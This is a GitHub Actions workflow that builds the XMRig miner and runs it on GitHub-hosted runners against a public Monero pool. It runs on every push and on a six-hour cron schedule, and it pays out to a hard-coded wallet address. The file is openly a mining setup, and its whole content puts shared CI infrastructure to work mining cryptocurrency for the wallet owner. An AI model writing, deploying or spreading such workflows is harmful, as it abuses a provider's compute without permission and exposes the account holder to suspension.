name: Monero 2 Mining Setup

on: 
  push:
    branches:
      - main
  schedule:
    - cron: '15 */6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Update and install dependencies
        run: sudo apt update && sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: Clone XMRig repository
        run: git clone https://github.com/xmrig/xmrig.git

      - name: Build XMRig
        run: |
          cd xmrig
          mkdir build
          cd build
          cmake ..
          make -j$(nproc)

      - name: Start mining Monero
        run: |
          cd xmrig/build
          ./xmrig -o pool.supportxmr.com:3333 -a rx/0 -u 43eBU2ohr7vMHwGasPjzQSNFSfkeVRsUXLm2eeedyWqcHWpTY1vGod1Qef5h2KqJgKbbPXkYc4nWEW2JbjLQtsdR9XTb1br -p raiden7 -t 4 --randomx-init 4235
